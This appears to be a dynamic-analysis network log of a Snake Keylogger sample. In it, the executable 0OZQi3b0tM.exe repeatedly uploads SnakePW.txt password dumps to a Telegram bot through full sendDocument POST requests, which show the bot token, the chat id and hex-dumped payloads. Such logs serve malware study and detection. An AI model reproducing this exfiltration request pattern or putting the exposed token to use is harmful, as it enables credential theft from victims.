                                                                    2022-06-26 07:34:39 UTC474OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 36 39 34 37 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571c6947c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:39 UTC475INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:39 UTC475INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67068,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228879,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    282192.168.2.550216149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:39 UTC476OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ca7423b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:39 UTC476OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 61 37 34 32 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ca7423bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:40 UTC477INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:40 UTC477INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67069,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    283192.168.2.550217149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:40 UTC477OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ce2db9d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:40 UTC478OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 65 32 64 62 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ce2db9dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:40 UTC478INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:40 UTC479INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67070,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    284192.168.2.550218149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:40 UTC479OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d19b236
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:40 UTC479OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 31 39 62 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d19b236Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:40 UTC480INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:40 UTC480INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67071,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    285192.168.2.550219149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:40 UTC481OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d554d65
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:40 UTC481OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 35 35 34 64 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d554d65Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:41 UTC482INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:41 UTC482INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67072,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    286192.168.2.550220149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:41 UTC482OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d8c298d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:41 UTC483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 38 63 32 39 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d8c298dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:41 UTC483INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:41 UTC484INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67073,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    287192.168.2.550221149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:41 UTC484OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575719153ffd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:41 UTC484OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 31 35 33 66 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575719153ffdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:42 UTC485INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:42 UTC485INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67074,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    288192.168.2.550222149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:42 UTC486OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571950daa0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
